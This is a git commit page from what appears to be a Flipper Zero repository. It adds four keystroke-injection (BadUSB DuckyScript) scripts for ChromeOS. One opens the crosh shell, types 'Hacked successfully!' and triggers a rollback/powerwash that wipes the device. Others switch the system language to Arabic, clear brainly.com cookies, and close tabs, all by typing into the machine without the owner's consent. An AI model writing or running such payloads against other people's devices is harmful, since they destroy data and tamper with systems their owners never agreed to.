Merge branch 'main' of https://github.com/UberGuidoZ/Flipper into mainRM

This commit is contained in:
RogueMaster 2023-07-05 13:34:12 -04:00
commit 216af6a709
7 changed files with 1151 additions and 2 deletions

File diff suppressed because it is too large Load Diff

@ -1 +1 @@
Subproject commit 88cae9c939d4424377f2dfcc2c8eb9454aadf820
Subproject commit 38e2a4e35b9f668dd1686ee11a1216132db675c8

View File

@ -0,0 +1,29 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Will commit a update rollback/powerwash
REM Might not work with enterprise enrolled devices
REM Requirement: CHROMEOS
DEFAULTDELAY 100
CTRL W
REPEAT 2
DELAY 2000
TAB
TAB
TAB
ENTER
DELAY 1000
STRING chrome-untrusted://crosh
ENTER
DELAY 3000
STRING Hacked successfully!
ENTER
DELAY 2000
STRING cat > /dev/null << EOF
ENTER
DELAY 500
STRING rollback
DELAY 1000
ENTER
DELAY 1000
STRING Y
DELAY 500
ENTER

View File

@ -0,0 +1,36 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Changes language in settings to arabic ( It will still have the language input bar in the bottom )
REM Requirements: CHROMEOS
DEFAULTDELAY 100
CTRL W
REPEAT 2
TAB
ENTER
DELAY 500
STRING add input methods
DELAY 1000
ENTER
REM -----
DELAY 3000
ENTER
DELAY 700
STRING arabic
DELAY 500
ENTER
TAB
TAB
ENTER
TAB
TAB
ENTER
REM -----
DELAY 500
SHIFT TAB
DELAY 70
SHIFT TAB
DELAY 70
SHIFT TAB
DELAY 70
ENTER
CTRL W
REPEAT 2

View File

@ -0,0 +1,17 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Resets brainly.com cookies for you
REM CHROMEOS
DEFAULTDELAY 500
CTRL T
STRING chrome://settings/siteData
ENTER
DELAY 3000
TAB
DELAY 2000
STRING brainly
DELAY 1000
TAB
REPEAT 3
ENTER
DELAY 1000
CTRL W

View File

@ -0,0 +1,6 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Closes all tabs ( Change the amount of CTRL W you want the more the ctrl W the more tabs it closes )
REM ChromeB
DEFAULTDELAY 100
CTRL W
REPEAT 2

@ -1 +1 @@
Subproject commit c2e44df7f2b4e45926bc1ea79301cc9f7b42030f
Subproject commit 5837453bde527c91b74c548db0159426bd68e2ad